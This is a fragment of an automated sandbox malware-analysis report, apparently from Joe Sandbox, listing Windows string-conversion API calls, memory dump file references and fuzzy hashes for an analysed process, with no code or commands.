                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0088C233
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0088C241
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0088C29C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                            • Opcode ID: e5b1b2af8b1a41bdd4d13473aed7c41e001651ad362e2c2a1e5aa0e4eca9038d
                                                                                                                                                                            • Instruction ID: 700c16c5a4a96653f6a507dda70e6c67d89c64c146d37250cbd493c9564e696d
                                                                                                                                                                            • Opcode Fuzzy Hash: e5b1b2af8b1a41bdd4d13473aed7c41e001651ad362e2c2a1e5aa0e4eca9038d
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F41B83160024AEFCB31AFE9C844AAA7BA5FF45710F148169F959EB1E9DB308D01C771